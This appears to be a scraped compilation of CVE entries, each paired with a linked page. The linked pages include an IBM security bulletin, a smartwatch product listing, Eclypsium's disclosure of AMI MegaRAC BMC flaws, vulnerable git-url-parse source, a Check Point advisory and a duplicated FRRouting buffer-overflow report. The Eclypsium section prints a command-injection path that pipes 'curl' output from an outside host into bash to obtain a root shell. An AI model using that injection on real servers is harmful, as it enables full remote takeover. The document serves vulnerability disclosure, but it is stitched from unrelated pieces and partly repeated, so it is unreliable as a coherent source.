An authorization logic error in the External Status Check API in GitLab EE affecting all versions starting from 14.1 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allowed a user to update the status of the check via an API call

CVE-2021-39943

IBM Navigator for i 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information for an object they are authorized to but not while using this interface. By performing a UNION based SQL injection an attacker could see file permissions through this interface. IBM X-Force ID: 239304.

**Security Bulletin**

  

**Summary**

IBM Navigator for i provides server administration functionality for IBM i. An authenticated user with authority to interact with IBM Navigator for i is able to download log files, view file attributes, and perform SQL injection attacks as described in the vulnerability details section. IBM Navigator for i has fixed the issues as described in the remediation/fixes section.

**Vulnerability Details**

**CVEID:**   CVE-2022-43859  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to obtain sensitive information for an object they are authorized to but not while using this interface. By performing a UNION based SQL injection an attacker could see file permissions through this interface.  
CVSS Base score: 6.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239304 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2022-43857  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to access IBM Navigator for i log files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks and download log files by modifying servlet filter.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239301 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-43858  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to access the file system and download files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks by modifying a parameter thereby gaining access to their files through this interface.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239303 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-43860  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to obtain sensitive information they are authorized to but not while using this interface. By performing an SQL injection an attacker could see user profile attributes through this interface.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239305 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM i

7.5

IBM i

7.4

IBM i

7.3

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

21 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSTS2D","label":"IBM i 7.3 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSB23CE","label":"IBM i 7.5 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG60","label":"IBM i"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0,7.4.0, 7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SS9QQS","label":"IBM i 7.4 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.4.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2022-43859: IBM Navigator for i is vulnerable to log file access, obtaining file attributes, and SQL Injection attacks due to multiple vulnerabilities.

Here are some of the most interesting, can't-miss sessions at the upcoming show in San Francisco.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

7 Sizzling Sessions to Check Out at RSA Conference 2023

Maxima Max Pro Power 1.0 486A devices allow BLE traffic replay. An attacker can use GATT characteristic handle 0x0012 to perform potentially disruptive actions such as starting a Heart Rate monitor.

Home Maxima Max Pro Power

Rs. 12,995.00 Rs. 2,999.00

283 customers are viewing this product

*   Description
*   Customer Reviews
*   Shipping & Returns

Maxima Power 1.43" Super AMOLED Bluetooth Calling Smart Watch, 466x466dpi Ultra Resolution, 60hz Refresh, Metallic Build, Hindi UI, AI Voice Assistant, BT 5.2 for Seamless Connection.

Experience the pinnacle of technology with the Maxima Max Pro Power Amoled Smartwatch. Its advanced features include Bluetooth calling, enabling you to make and receive calls directly from your wrist. The Super AMOLED Display with a resolution of 466x466 pixels delivers stunning visuals with vibrant colors. With Hindi UI support, navigating through the watch's interface becomes effortless. Stay seamlessly connected with BT5.2 technology, ensuring stable connections with your devices. Choose from over 100 sports modes to track your fitness activities accurately. Customize your watch face from a collection of over 100 options to match your style. Monitor your heart rate, sleep patterns, and blood oxygen levels with precision. With its premium metallic build, this smartwatch is a perfect blend of elegance and durability, making it a must-have accessory for the modern individual.

*   **Made In India**: Proudly manufactured in India, ensuring high-quality craftsmanship and supporting local industries.
*   **Bluetooth calling**: Stay connected on the go by making and receiving calls directly from your smartwatch.
*   **Super AMOLED Display**: Immerse yourself in stunning visuals and vibrant colors on the Super AMOLED display
*   **466x466px dpi resolution**: Enjoy sharp and detailed images with the high-resolution display with 1000 Nits Brightness
*   **Hindi UI Support**: Navigate the watch's interface effortlessly with user-friendly support for the Hindi language.
*   **BT5.2 for Seamless Connection**: Experience stable and reliable connections with Bluetooth 5.2 technology.
*   **100+ Sports Mode**: Track and monitor over 100 different sports activities to stay motivated and reach your fitness goals
*   **100+ Watch Faces**: Personalize your smartwatch's look with a wide range of watch face options to suit your style.
*   **Heart Rate Monitor**: Keep track of your heart rate to optimize your workouts and monitor your overall cardiovascular health.
*   **Sleep Monitor**: Gain insights into your sleep patterns, including deep sleep and REM cycles, to improve your sleep quality.
*   **SpO2 Monitor**: Measure your blood oxygen saturation levels to ensure optimal respiratory health during physical activities.
*   **Premium Metallic Build**: Designed with a premium metallic construction, the smartwatch combines style and durability for a sophisticated and long-lasting design.

**Specification**

Model

Max Pro Power

Dimensions

46.5 x 46.5 X 10.65 mm

Strap Variant

Silicone, SS Metal Chain

Strap Length

90 x 120 mm

Weight

30gm (Watch Head) 46.8gm (Watch Head + Strap)

Water Resistant

IP68 Water Resistant

Body Material

Premium Metal

Display

Ultra Bright Screen Topping 1000 Nits

Touch Screen

1.43" Super Amoled Precision Retina Display

Bluetooth

5.2

Charging Time

Less than 2 hrs.

Charging Method

Magnetic Pin Charger

Battery Life

Upto 3 Days with calling & Upto 7 Days without Calling Function

Supported Devices

Android 8.0 / IOS 9.0 and above

In the box

Smartwatch, Charger, Service Manual/ Guarantee card

Warranty

1 year. Please make sure to activate your warranty

Supported App

FitCloud Pro

Strap Colours

Jet Black SS Chain, Space Black, Rose Gold Black, Blue

  
  

**Shipping**

Shipping is free across India on all our products.

**7 DAYS RETURN/ REPLACEMENT/ REFUND POLICY**

P A Time Industries Unit-II offers 7 days replacement/return/refund guarantee for all products sold on smart.maximawatches.com. Customers may notify us of any damage or defect within 7 days from the date of delivery. P A Time Industries Unit-II will replace the defective product with a brand new product at no extra cost. P A Time Industries Unit-II will try to replace the specific product ordered. However, the company reserves the right to offer an alternate product in case the product is out of stock/ production. The 7 days return policy is valid only in cases of manufacturing defects and transport damages and is invalid in cases of damages due to normal wear & tear and negligence on part of the customer. Refunds are issued in the following two ways Product replacement - In case of damaged or incorrect items P A Time Industries Unit-II would replace it with a new one, upon receipt of the returned item In case you do not wish to receive the replacement, you may specify that in your communication with our customer service by phone or e-mail. You would receive maxima store credit of the equivalent amount. We do not provide cash refunds.

CVE-2023-46916: Maxima Max Pro Power

AMI MegaRAC Redfish Arbitrary Code Execution

**BMC&C**

Eclypsium Research has discovered and reported 3 vulnerabilities in AMI MegaRAC Baseboard Management Controller (BMC) software. We are referring to these vulnerabilities collectively as BMC&C. MegaRAC BMC is widely used by many leading server manufacturers to provide “lights-out” management capabilities for their server products. Server manufacturers that are known to have used MegaRAC BMC include but are not limited to the following: 

AMD

Ampere Computing

ASRock

Asus

ARM

Dell EMC

Gigabyte

Hewlett-Packard Enterprise

Huawei

Inspur

Lenovo

NVidia

Qualcomm

Quanta

Tyan

The BMC&C vulnerabilities range in severity from Medium to Critical, including remote code execution and unauthorized device access with superuser permissions. The vulnerabilities can be exploited by remote attackers having access to remote management interfaces (Redfish, IPMI). Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project.

These vulnerabilities pose a major risk to the technology supply chain that underlies cloud computing. In short, vulnerabilities in a component supplier affect many hardware vendors, which in turn can pass on to many cloud services. As such these vulnerabilities can pose a risk to servers and hardware that an organization owns directly as well as the hardware that supports the cloud services that they use.

BMCs are designed to provide administrators with near total and remote control over the servers they manage. AMI is a leading provider of BMCs and BMC firmware to a wide range of hardware vendors and cloud service providers. As a result, these vulnerabilities potentially affect a very large number of devices, and could enable attackers to gain control of or cause damage not only to devices but to data centers and cloud services

The vulnerabilities discovered are addressed by the following CVEs:

*   CVE-2022-40259 – Arbitrary Code Execution via Redfish API
*   CVE-2022-40242 – Default credentials for UID = 0 shell via SSH
*   CVE-2022-2827 – User enumeration via API

The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking). At this time, it is unknown whether these vulnerabilities are under active exploitation.

These risks are magnified by MegaRAC’s position as the world’s leading provider of BMC remote management firmware, sitting at the top of the BMC supply chain. This firmware is a foundational component of modern computing found in hundreds of thousands of servers in data centers, server farms, and cloud infrastructure around the world. And since devices in these environments typically standardize on a hardware configuration, a vulnerable configuration could likely be shared across thousands of devices. Additionally, some of this research was enabled by the discovery of a substantial amount of AMI intellectual property on the Internet. The availability of this information could naturally increase the likelihood of attacks in the wild. 

Eclypsium Research has been following a Coordinated Vulnerability Disclosure process, including AMI and other affected parties. Additionally, AMI and Eclypsium have reached out to multiple parties who are working to determine the scope of impacted products and services.

**About MegaRAC Baseboard Management Controllers (BMCs)**

Baseboard Management Controllers (BMCs) are powerful and privileged components that provide out-of-band management for modern servers. For all intents and purposes, a BMC is a fully functional independent computer within a server, equipped with its own independent power, firmware, memory, and networking stack. This allows remote administrators to control virtually everything on the device from low-level hardware settings to managing the host operating system, virtual hosts, applications, or data. The BMC can allow administrators to manage the host even when the host itself is powered off. 

The unique power and capabilities of BMCs make them particularly dangerous if compromised by attackers. Recently, attackers used BMC implants known as iLOBleed to attack data centers and completely wipe the disks of servers. Just as importantly, iLOBleed used the unique powers of firmware to do this repeatedly. Since the malicious code was hidden within the BMC firmware, the implant was able to persist even after the server operating system was reinstalled, enabling the attacker to repeat the cycle of destroying data after the server was recovered. Additionally, the implant took the added steps of silently preventing the system from updating the BMC firmware while spoofing results to make it appear that the firmware had been updated. While the iLOBleed implants are not directly related to the BMC&C vulnerabilities, they serve as a real-world example of the damage attackers can inflict on a large number of devices with access to their BMCs.

**A Fault Line in the Cloud Supply Chain**

To properly appreciate the scope of the BMC&C vulnerabilities, it is important to understand the role AMI MegaRAC plays in the supply chain of cloud data centers. Naturally, many enterprises are attracted to the cloud due to the ability to abstract computing resources from the cost and ongoing maintenance of physical hardware. However, clouds still ultimately run on hardware – and that translates to vast numbers of servers from many different vendors.

MegaRAC BMC firmware is one of the common threads that connects much of the hardware that underlies the cloud. As a result, any vulnerability in MegaRAC can easily spread through the extended supply chain to affect dozens of vendors and potentially millions of servers. Additionally, in order to abstract computing from the hardware, it is critical that the physical servers within a data center are interchangeable. To this end, cloud providers standardize on server components, hardware configurations, firmware & operating system versions, and hypervisor software. So if a vulnerable BMC is used in a data center environment, it is highly likely that hundreds or thousands of devices will share that same vulnerability. In the context of an attack, this could potentially put entire clouds at risk. 

**Discovery Process**

In August 2022, Eclypsium Research was made aware of a leak of intellectual property, purported to come from AMI, which had been posted online. After downloading and reviewing the data, it appeared legitimate, and since there was a chance others had accessed it the decision was made to look for vulnerabilities in case malicious actors were doing the same. The focus quickly narrowed down to the Redfish API, as it is remotely accessible and a first choice for attackers. 

**Vulnerability Details**

*   CVE-2022-40259 – Arbitrary Code Execution via Redfish API
*   CVE-2022-40242 – Default credentials for UID = 0 shell via SSH
*   CVE-2022-2827 – User enumeration via API

**BMC&C Attack Scenario****CVE-2022-40259 – Arbitrary Code Execution via Redfish API**

CVSS v3.1 Score : **9.9 Critical** (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

To find this issue, initially we reviewed for potentially dangerous calls such as command execution calls. We narrowed it down only to calls exposed to the user, and there was one sitting in the Redfish API implementation. The only complication is the attack sits in the path parameter, but it is not URL-decoded by the framework, so the exploit needs to be crafted specially to both be valid per URL and valid per bash shell command. The exploit looks roughly as follows (note that we have edited out a few details – like where it actually is – so as not to release a ready-made exploit for attackers):

http://<device>/super/secret/path;curl${IFS}domain.com|bash;

The path needs to be sent as-is in the HTTP request. domain.com needs to host a reverse shell (we will not be providing one, but it uses an available scripting language present on-board and is otherwise unremarkable). This exploit leads straight into a UID = 0 shell (UID = 0 user, confusingly, is called sysadmin), and does require the attacker to have a minimum access level on the device (Callback or up).

**CVE-2022-40242 – Default credentials for UID = 0 shell via SSH**

CVSS v3.1 Score : **8.3 High** (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)

As a second part for enumeration, we looked for available credentials in normal locations for a Linux system. We found a hash in /etc/shadow for the sysadmin user and managed to crack it. The password looked like a default, and we managed to find backreferences to it going as far back as 2014 by other people. Finding them is left as an exercise to the reader.

**CVE-2022-2827 – User enumeration via API**

CVSS v3.1 Score : **7.5 High** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

When making a request for a password reset, one of the parameters can be manipulated in such a way that it is possible to determine whether the user exists or not, with no prior knowledge other than the username itself. The vulnerability also allows an attacker to test for the presence of user accounts by iterating through a list of possible account names.

**Attack Scenarios**

The first two CVEs (CVE-2022-40259, CVE-2022-40242) lead straight into the UID = 0 administrative shell, with no further escalation necessary. CVE-2022-40259 requires prior access to at least a low-privilege account (Callback privileges or higher), while CVE-2022-40242 requires nothing more than remote access to the device, albeit on some devices this account may be disabled. The third vulnerability (CVE-2022-2827) would require additional steps for full exploitation; e.g. it allows for pinpointing pre-existing users and does not lead into a shell but would provide an attacker a list of targets for brute force or credential stuffing attacks.

These vulnerabilities can pose serious risks in any case in which an attacker has access to an affected server’s BMC. As a security best practice, BMCs should not be directly exposed to the Internet and scans performed after the initial disclosure indicate that public exposure is relatively low compared to recent high-profile vulnerabilities in other infrastructure products. However, it is quite common to find BMCs that are exposed due to either misconfigurations or poor security hygiene. Additionally, these vulnerabilities could be exploited by an attacker that has gained initial access into a data center or administrative network. As data centers tend to standardize on specific hardware platforms, any BMC-level vulnerability would most likely apply to large numbers of devices and could potentially affect an entire data center and the services that it delivers. Due to the nature and location of BMC vulnerabilities, detecting exploitation is complex as standard EDR & AV products focus on the operating system, not the underlying firmware. 

**Mitigations**

*   Ensure that all remote server management interfaces (e.g. Redfish, IPMI) and BMC subsystems in their environments are on their dedicated management networks and are not exposed externally, and ensure internal BMC interface access is restricted to administrative users with ACLs or firewalls.  
    
*   Review vendor default configurations of device firmware to identify and disable built-in administrative accounts and/or use remote authentication where available.  
    
*   Perform regular software and firmware updates in critical servers.  
    
*   Ensure that vulnerability assessments include remote server management subsystems (like MegaRAC, iDRAC, iLO, etc.) and critical firmware.  
    
*   Ensure that all critical firmware in servers is regularly monitored for indicators of compromise or unauthorized modifications.  
    
*   Perform supply chain checks of new equipment. Assess that all new servers have major vulnerabilities patched and the latest firmware updates installed.  
    
*   For Eclypsium customers, the platform will provide coverage of recently discovered vulnerabilities through a new functionality that will dynamically update scan results. 
*   Eclypsium has collaborated with Greynoise to provide detection signatures which will provide threat intelligence should any malicious actor begin indiscriminate exploitation attempts of CVE-2022-40259 or CVE-2022-2827.

**Conclusions**

Securing the firmware supply chain is a complex problem, and vulnerabilities found at the top of the chain present substantial risk due to the way OEMs integrate code into their products. Firmware vulnerabilities are non-trivial to remediate due the fact their location in the computing stack is not optimized for patching at scale. Furthermore, standardization of hosting & cloud providers on server components means these vulnerabilities can easily impact hundreds of thousands, possibly millions of systems. 

As attackers shift their focus from user facing operating systems to the lower level embedded code which hardware relies on, compromise becomes harder to detect and exponentially more complex to remediate. While compromise of a server OS can be resolved with a wipe & reinstallation, firmware compromise has the potential to remain beyond reinstallation and even more drastic measures like hard drive replacement. Security research into this area is imperative to stay a step ahead of the attacks and protect the foundation upon which modern computing relies on.

CVE-2022-40259: Supply Chain Vulnerabilities Put Server Ecosystem At Risk - Eclypsium

giturlparse (aka git-url-parse) through 1.2.2, as used in Semgrep through 1.21.0, is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing untrusted URLs. This might be relevant if Semgrep is analyzing an untrusted package (for example, to check whether it accesses any Git repository at an http:// URL), and that package's author placed a ReDoS attack payload in a URL used by the package.

\# vim: tabstop=4 shiftwidth=4 softtabstop=4 \# Copyright (c) 2017 John Dewey # \# Permission is hereby granted, free of charge, to any person obtaining a copy \# of this software and associated documentation files (the "Software"), to \# deal in the Software without restriction, including without limitation the \# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or \# sell copies of the Software, and to permit persons to whom the Software is \# furnished to do so, subject to the following conditions: # \# The above copyright notice and this permission notice shall be included in \# all copies or substantial portions of the Software. # \# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING \# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER \# DEALINGS IN THE SOFTWARE. import collections import re Parsed \= collections.namedtuple('Parsed', \[ 'pathname', 'protocols', 'protocol', 'href', 'resource', 'user', 'port', 'name', 'owner', \]) POSSIBLE\_REGEXES \= ( re.compile(r'^(?P<protocol>https?|git|ssh|rsync)\\://' r'(?:(?P<user>.+)@)\*' r'(?P<resource>\[a-z0-9\_.-\]\*)' r'\[:/\]\*' r'(?P<port>\[\\d\]+){0,1}' r'(?P<pathname>\\/((?P<owner>\[\\w\\-\]+)\\/)?' r'((?P<name>\[\\w\\-\\.\]+?)(\\.git|\\/)?)?)$'), re.compile(r'(git\\+)?' r'((?P<protocol>\\w+)://)' r'((?P<user>\\w+)@)?' r'((?P<resource>\[\\w\\.\\-\]+))' r'(:(?P<port>\\d+))?' r'(?P<pathname>(\\/(?P<owner>\\w+)/)?' r'(\\/?(?P<name>\[\\w\\-\]+)(\\.git|\\/)?)?)$'), re.compile(r'^(?:(?P<user>.+)@)\*' r'(?P<resource>\[a-z0-9\_.-\]\*)\[:\]\*' r'(?P<port>\[\\d\]+){0,1}' r'(?P<pathname>\\/?(?P<owner>.+)/(?P<name>.+).git)$'), re.compile(r'((?P<user>\\w+)@)?' r'((?P<resource>\[\\w\\.\\-\]+))' r'\[\\:\\/\]{1,2}' r'(?P<pathname>((?P<owner>\\w+)/)?' r'((?P<name>\[\\w\\-\]+)(\\.git|\\/)?)?)$'), ) class ParserError(Exception): """ Error raised when a URL can't be parsed. """ pass class Parser(object): """ A class responsible for parsing a GIT URL and return a \`Parsed\` object. """ def \_\_init\_\_(self, url): self.\_url \= url def parse(self): """ Parses a GIT URL and returns an object. Raises an exception on invalid URL. :returns: Parsed object :raise: :class:\`.ParserError\` """ d \= { 'pathname': None, 'protocols': self.\_get\_protocols(), 'protocol': 'ssh', 'href': self.\_url, 'resource': None, 'user': None, 'port': None, 'name': None, 'owner': None, } for regex in POSSIBLE\_REGEXES: match \= regex.search(self.\_url) if match: d.update(match.groupdict()) break else: msg \= "Invalid URL '{}'".format(self.\_url) raise ParserError(msg) return Parsed(\*\*d) def \_get\_protocols(self): try: index \= self.\_url.index('://') except ValueError: return \[\] return self.\_url\[:index\].split('+')

CVE-2023-32758: git-url-parse/parser.py at master · coala/git-url-parse

Check Point Endpoint Security Client for Windows versions earlier than E86.40 copy files for forensics reports from a directory with low privileges. An attacker can replace those files with malicious or linked content, such as exploiting CVE-2020-0896 on unpatched systems or using symbolic links.

CVE-2022-23742 - Local Privileges Escalation in Check Point Endpoint Security Client's EFRService

**Technical Level**

Solution ID

sk179132

Technical Level 

Severity

Low

Product

Endpoint Security Client

Version

All

OS

Windows

Date Created

2022-05-11 23:14:12.0

Last Modified

2022-05-11 23:14:12.0

Symptoms

*   The EFRService, which collects forensics data for various blades for the Check Point Endpoint Security Client for Windows, copies files for forensics reports from a directory with insufficient privileges. A local attacker can replace those files with malicious or linked content, which will run in higher privileges, as the Endpoint Client requires.
    

Solution

This issue was discovered and responsibly disclosed by Alain Rödel of cirosec GmbH and received ID CVE-2022-23742.

This problem was fixed. The fix is included starting from:

*   Enterprise Endpoint Security E86.40 Windows Clients.

CVE-2022-23742: 2022-23742 - Local Privileges Escalation in Check Point Endpoint Security Client's EFRService

An issue was discovered in Socomec REMOTE VIEW PRO 2.0.41.4. Improper validation of input into the username field makes it possible to place a stored XSS payload. This is executed if an administrator views the System Event Log.

Device Model\*  :

Device Power\*  :

Operating System for this application\*  :

Remote Monitoring application (if used)  :

Country  :

LICENCE CONTRACT\* (legal condition)  
Copyright:  
The information contained are not conditional and may be changed without due notice. The software manufacturer undertakes no obligations with this information. The software described is given on the basis of a license contract and an obligation to secrecy (i.e. an obligation not to further publicise the software material).  
The purchaser may make a single copy of the software material for backup purposes. No parts may be transferred to third parties, either electronically or mechanically, or by photocopies or similar means, without the express written permission of the software manufacturer.  
Copyright of the European Union is effective (Copyright EU).  
Copyright (c) 2002-2003 SOCOMEC UPS, Isola Vicentina, Italy. All rights reserved.  
Limited Warranty:  
This software and the enclosed materials are provided without warranty of any kind. The entire risk as to software quality, performance of the program, media free of defects, faulty workmanship, incorrect use of the software or UPS, error free documentation and enclosed material is assumed by the user.  
We do not take any warranty to the correct functions of the software and the security of your system or files, that might be damaged due to possible incorrect functioning of our software. No warranty to correct functions of the software with the operating systems, loss of data or interruption of work processes.

CVE-2021-41871: Download REMOTE VIEW: Supervision software

A buffer overflow vulnerability exists in FRRouting through 8.1.0 due to missing a check on the input packet length in the babel_packet_examin function in babeld/message.c.

The code below misses a check on the relationship between `packetlen` and `bodylen` before Line 298, which may lead to buffer overflows when accessing the memory at Line 300 and Line 309.

babel\_packet\_examin(const unsigned char \*packet, int packetlen)

{

unsigned i = 0, bodylen;

const unsigned char \*message;

unsigned char type, len;

if(packetlen < 4 || packet\[0\] != 42 || packet\[1\] != 2)

return 1;

DO\_NTOHS(bodylen, packet + 2);

while (i < bodylen){

message = packet + 4 + i;

type = message\[0\];

if(type == MESSAGE\_PAD1) {

i++;

continue;

}

if(i + 1 > bodylen) {

debugf(BABEL\_DEBUG\_COMMON,"Received truncated message.");

return 1;

}

len = message\[1\];

To fix, we may put the code below before the while loop:

    if (packetlen < bodylen + 4) {
        debugf(BABEL_DEBUG_COMMON,"Received truncated message."); 
        return 1; 
    }
    

The output of the address sanitizer:

    ==271648==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000114 at pc 0x00000059301a bp 0x7fff3f7301f0 sp 0x7fff3f7301e8
    READ of size 1 at 0x603000000114 thread T0
        #0 0x593019 in babel_packet_examin /home/parallels/myfrr/babeld/message.c:300:16
        #1 0x593019 in parse_packet /home/parallels/myfrr/babeld/message.c:354:9

CVE-2022-26127: Miss a check on length in Babel · Issue #10487 · FRRouting/frr

The code below misses a check on the relationship between packetlen and bodylen before Line 298, which may lead to buffer overflows when accessing the memory at Line 300 and Line 309.

babel\_packet\_examin(const unsigned char \*packet, int packetlen)

{

unsigned i \= 0, bodylen;

const unsigned char \*message;

unsigned char type, len;

if(packetlen < 4 || packet\[0\] != 42 || packet\[1\] != 2)

return 1;

DO\_NTOHS(bodylen, packet + 2);

while (i < bodylen){

message \= packet + 4 + i;

type \= message\[0\];

if(type \== MESSAGE\_PAD1) {

i++;

continue;

}

if(i + 1 \> bodylen) {

debugf(BABEL\_DEBUG\_COMMON,"Received truncated message.");

return 1;

}

len \= message\[1\];

To fix, we may put the code below before the while loop:

    if (packetlen < bodylen + 4) {
        debugf(BABEL_DEBUG_COMMON,"Received truncated message."); 
        return 1; 
    }
    

The output of the address sanitizer:

    ==271648==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000114 at pc 0x00000059301a bp 0x7fff3f7301f0 sp 0x7fff3f7301e8
    READ of size 1 at 0x603000000114 thread T0
        #0 0x593019 in babel_packet_examin /home/parallels/myfrr/babeld/message.c:300:16
        #1 0x593019 in parse_packet /home/parallels/myfrr/babeld/message.c:354:9

Search

lenovo warranty check/lookup | check warranty status | lenovo support us